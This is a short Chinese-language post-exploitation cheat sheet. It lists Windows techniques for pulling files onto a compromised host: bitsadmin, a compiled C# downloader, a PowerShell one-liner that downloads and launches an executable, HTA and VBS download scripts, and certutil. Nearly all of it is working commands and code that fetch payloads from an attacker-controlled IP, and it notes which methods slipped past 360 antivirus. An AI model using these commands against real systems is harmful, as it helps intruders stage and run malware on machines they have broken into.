后渗透上传

发表于 | 分类于 |

bitsadmin下载文件

bitsadmin是一个控制台工具,可用于创建下载或上传工作和监测其进展情况。xp以后的Windows系统自带,需要使用超级管理员用户运行,会被杀软检测查杀。

1
2
bitsadmin /transfer job_name /download /priority priority URL local\path\file
bitsadmin /transfer n http://192.168.1.1/1.exe C:\test\update\1.exe

利用CSC(windows的c#编译器)来下载文件

利用win自带程序csc.exe,对cs脚本进行编译为download.exe程序,执行该程序可进行下载

1
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:c:\test\download.exe download.cs

download.cs

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
using System.Net;
namespace downloader
{
    class Program
    {
        static void Main(string[] args)
        {
            WebClient client = new WebClient();
            string URLAddress = @"http://192.168.1.1/1.exe";
            string receivePath = @"C:\test\";
            client.DownloadFile(URLAddress, receivePath + System.IO.Path.GetFileName
        (URLAddress));
        }
    }
}

利用powershell下载文件

powershell直接运行,一般会被杀软拦截

1
powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/1.exe','C:\test\1.exe');start-process 'C:\test\1.exe'

利用hta下载文件

保存后缀为.hta文件运行,360杀软未拦截

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<html>
<head>
<script>
var Object = new ActiveXObject("MSXML2.XMLHTTP");
Object.open("GET","http://ip/evil.dtd",false);
Object.send();
if (Object.Status == 200)
{
    var Stream = new ActiveXObject("ADODB.Stream");
    Stream.Open();
    Stream.Type = 1;
    Stream.Write(Object.ResponseBody);
    Stream.SaveToFile("C:\\test\\evil.dtd", 2);
    Stream.Close();
}
window.close();
</script>
<HTA:APPLICATION
WINDOWSTATE = "minimize">
</head>
<body>
</body>  
</html>

利用vbs下载文件

保存后缀为.vbs文件运行,360杀软未拦截

1
2
3
4
5
6
7
8
9
10
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://192.168.1.1/evil.dtd",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "C:\test\vps_success.dtd",2

利用certutil下载文件

直接cmd执行

1
2
指定文件名保存:
certutil.exe -urlcache -split -f http://192.168.1.1/1.txt 1.php